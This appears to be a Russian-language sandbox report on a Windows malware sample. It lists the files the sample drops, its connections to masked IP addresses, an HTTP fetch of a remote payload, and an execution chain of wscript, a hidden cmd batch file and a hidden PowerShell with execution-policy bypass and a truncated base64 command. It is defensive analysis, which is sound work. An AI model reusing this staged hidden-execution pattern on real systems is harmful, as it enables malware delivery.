Техническая информация
Изменения в файловой системе
Создает следующие файлы
- %WINDIR%\temp\olivewoods.bat
- %WINDIR%\temp\teeniest.vbs
- nul
Удаляет следующие файлы
- %WINDIR%\temp\teeniest.vbs
Сетевая активность
Подключается к
- '10#.#72.132.57':80
- '62.##.208.170':80
TCP
Запросы HTTP GET
- http://10#.#72.132.57/arquivo_e07ec560850643b589844fbda439fc92.txt
Другое
Ищет следующие окна
- ClassName: 'HTML Application Host Window Class' WindowName: ''
Создает и запускает на исполнение
- '%WINDIR%\syswow64\wscript.exe' //nologo "%WINDIR%\Temp\teeniest.vbs"
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c "%WINDIR%\Temp\olivewoods.bat" (со скрытым окном)
- '%WINDIR%\syswow64\timeout.exe' /t 1 /nobreak
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -w hidden -noprofile -ep bypass -c "$b64='JG5vbmFnZSA9ICdWa0ZKJzskcGx1bmtzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbm9uYWdlKTskdHJhZ2ljaSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V... (со скрытым окном)
